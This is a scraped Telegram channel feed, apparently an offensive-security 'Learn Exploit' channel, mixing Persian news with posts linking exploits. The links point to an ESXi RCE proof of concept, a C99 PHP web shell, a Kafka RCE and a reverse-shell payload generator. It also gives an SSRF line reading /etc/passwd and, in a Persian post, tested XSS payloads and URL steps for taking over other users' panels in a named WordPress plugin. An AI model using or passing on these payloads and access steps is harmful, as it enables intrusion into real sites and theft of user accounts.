0Day.Today | Learn Exploit | Zero World | Dark web

ChatGPT for Offensive Security

#ChatGPT
——————
0Day.Today
@LearnExploit
@Tech_Army

1.8K views21:51

0Day.Today | Learn Exploit | Zero World | Dark web |

اگر از VMware استفاده میکنید، این موج جدید حملات باج افزاری به سرورهای ESXi بانام ESXiArgs روجدی بگیرید! تنها در فرانسه ۲۵۰۰ سرور بااستفاده از یک آسیب پذیری شناخته شده هک شدند و چندین ارائه دهنده سرویسهای ابری هم قربانی شدند. از سال ۲۰۲۱ یک exploit این باگ در اینترنت موجود بود.

منبع : Dawood Sajjadi

#VMware #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army

1.8K views21:58

0Day.Today | Learn Exploit | Zero World | Dark web |

Decrypt your *.vmdk affected by CVE-2020-3992

Read Here

#VMware
——————
0Day.Today
@LearnExploit
@Tech_Army

1.8K views22:04

0Day.Today | Learn Exploit | Zero World | Dark web |

POC for CVE-2021-21974 VMWare ESXi RCE Exploit

Read Here

Exploit

#RCE #POC #Exploit #VMware
——————
0Day.Today
@LearnExploit
@Tech_Army

1.8K viewsedited 22:20

0Day.Today | Learn Exploit | Zero World | Dark web |

Dota 2 Under Attack: How a V8 Bug Was Exploited in the Game

Read Here

#Exploit #Game
——————
0Day.Today
@LearnExploit
@Tech_Army

Avast Threat Labs

Dota 2 Under Attack: How a V8 Bug Was Exploited in the Game - Avast Threat Labs

Avast discovered an exploit for CVE-2021-38003 was used in the wild to attack Dota 2 players. This exploit achieved remote code execution on other players' machines by taking advantage of Dota's usage of an outdated V8 version. In response to Avast's findings…

1.7K views13:25

0Day.Today | Learn Exploit | Zero World | Dark web |

An overview of the VMware ESXi versions exposed to the Internet:

Link

#Shodan #VMware
——————
0Day.Today
@LearnExploit
@Tech_Army

1.7K views13:32

0Day.Today | Learn Exploit | Zero World | Dark web |

پاسخ گوگل به مایکروسافت؛ هوش مصنوعی Bard به موتور جستجوی گوگل اضافه می‌شود

اهالی ماونتین ویو امشب دمویی از عملکرد هوش مصنوعی «بارد» (Bard) را برای موتور جستجوی خود به نمایش گذاشتند که پاسخی به ChatGPT و ادغام نسخه پیشرفته‌تر آن در موتور جستجوی بینگ مایکروسافت است.

«پراباکار رغوان»، معاون ارشد گوگل در دموی امشب نشان داد که این هوش مصنوعی چگونه می‌تواند در پاسخ به سؤالی درباره بهترین صورت‌های فلکی در آسمان، یک پاسخ مکالمه‌ای را در صفحه جستجو ارائه کند.

رغوان گفت قابلیت‌های جدید هوش مصنوعی زایا می‌تواند اطلاعات پیچیده و دیدگاه‌های مختلف را مدیریت و سامان‌دهی کند. گوگل مدعی است که با این روش، کاربر می‌تواند با کمک بارد به‌سرعت تصویر کلی را ببیند و بعد اگر تمایل داشت، جزئیات مسئله را از زاویه‌های مختلف بررسی کند.

#ChatGPT #News
——————
0Day.Today
@LearnExploit
@Tech_Army

1.8K viewsedited 20:09

0Day.Today | Learn Exploit | Zero World | Dark web |

Akamai WAF Bypass read internal files via SSRF

target[.]com/download?url=file:///etc/passwd (Blocked by akamai waf)

#SSRF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

1.9K viewsedited 20:14

0Day.Today | Learn Exploit | Zero World | Dark web |

ESXiArgs Recover - A tool to recover from ESXiArgs ransomware

Github

#VMware #ESXiArgs #ransomware
——————
0Day.Today
@LearnExploit
@Tech_Army

1.9K views20:58

0Day.Today | Learn Exploit | Zero World | Dark web |

C99 Shell

PHP 7 and safe-build Update of the popular C99 variant of PHP Shell

Github

#Shell #c99
——————
0Day.Today
@LearnExploit
@Tech_Army

1.9K views11:33

0Day.Today | Learn Exploit | Zero World | Dark web |

CVE-2023-25194 - Apache Kafka 3.4.0 Rce

Github

#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army

1.8K views14:57

0Day.Today | Learn Exploit | Zero World | Dark web |

تلگرام دیگر از خواست‌های پیامکی در تلگرام های غیر رسمی پشتیبانی نخواهد کرد.

طبق پیامی که تلگرام برای توسعه دهندگان برنامه های غیر رسمی ارسال کرده است، تلگرام قصد دارد پشتیبانی از درخواست های پیامک از برنامه های شخص ثالث را متوقف کند، به این معنی که کاربران می توانند تأیید پیامک را فقط از برنامه های رسمی تلگرام درخواست کنند.

این تغییر قرار است در 18 فوریه اعمال شود. پس از آن تاریخ، کدهای فعال سازی برای برنامه های شخص ثالث فقط از طریق برنامه های رسمی تلگرام قابل دریافت هستند.

#Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army

1.9K views17:59

0Day.Today | Learn Exploit | Zero World | Dark web |

CVE-2022-21587 POC

Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (Upload)

Exploit

#POC #CVE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army

2.0K viewsedited 20:30

0Day.Today | Learn Exploit | Zero World | Dark web |

APKHunt - OWASP MASVS Static Analyzer

Github

#Owasp #Pentest #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army

2.0K views07:30

0Day.Today | Learn Exploit | Zero World | Dark web |

0:44

Media is too big

VIEW IN TELEGRAM

هک صدا و سیما توسط گروه هکری عدالت علی هنگام پخش سخنرانی ابراهیم رئیسی در مراسم حکومتی ۲۲ بهمن، تصاویری را با پیام «‌پول‌هایتان را از بانک‌ها بیرون بکشید» و نمایش شعار‌ «‌مرگ بر خامنه‌ای» و فراخوان «‌۲۷ بهمن» پخش کرد

#news
——————
0Day.Today
@LearnExploit
@Tech_Army

2.2K viewsedited 09:01

0Day.Today | Learn Exploit | Zero World | Dark web |

قابلیت جدید اینستاگرام که مشابه OnlyFans ولی اخلاقی تر است توسط مهراد هیدن و بهزاد لیتو فعال شد!

شما با پرداخت ماهانه حدود 5 یورو میتوانید از محتوای اختصاصی پست ، استوری و لایو که فالور های عادی نمیتوانند ببینند را تماشا کنید و با این اشتراک میتوانید شانس صحبت در دایرکت با آرتیست را هم بالا ببرید.

#Instagram #news
——————
0Day.Today
@LearnExploit
@Tech_Army

2.1K views12:46

0Day.Today | Learn Exploit | Zero World | Dark web |

CVE-2022-23935 ( Python Exploit for CVE-2022-23935 )

Staged Reverse Shell Payload Generator for CVE-2022-23935

Github

#Exploit #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army

2.1K views12:49

0Day.Today | Learn Exploit | Zero World | Dark web |

Tiny XSS Payloads

A collection of tiny XSS Payloads that can be used in different contexts.

Github

#Xss #payload
——————
0Day.Today
@LearnExploit
@Tech_Army

2.2K views20:32

0Day.Today | Learn Exploit | Zero World | Dark web |

در نسخه جدید پلاگین ژاکت:
zhaket.com/web/wp-advanced-support-ticket
باگی وجود داره که میتونید از طریق این پلاگین خیلی ساده به پنل افراد دیگه دسترسی داشته باشید.
site.ir/my-account/tickets/?sss=t&ddd=1

پیلود تست شده :

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

پیلود تست شده :
https://site.ir/my-account/tickets/?action=view&ticket-id=22%3Cscript%3Ealert(1)%3C/script%3E

بجای عدد 1، ایدی عددی یوزر مورد نظرو بزنید. خودکار لاگین میشید.
site.ir/my-account/tickets/?sss=t&ddd=1

#XSS #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army

2.2K views07:07

0Day.Today | Learn Exploit | Zero World | Dark web |

سرچ انجین Hunter

Hunter.how

#Shodan #osint #hunter
——————
0Day.Today
@LearnExploit
@Tech_Army

2.3K views11:01

0Day.Today | Learn Exploit | Zero World | Dark web |

ورود آیفون ممنوع شد .

طبق ابلاغیه مدیر کل دفتر واردات گمرک ایران از اول اسفندماه گوشی تلفن همراه با نشان تجاری اپل، مدل ۱۴ و کلیه مدل‌های بعد از آن، جزء لیست کالاهای مجاز همراه مسافر و پستی ورودی به کشور نیست.

وزارت صمت مرجع صادرکننده این ابلاغیه است.

#news
——————
0Day.Today
@LearnExploit
@Tech_Army

2.2K views16:26

About

Blog

Apps

Platform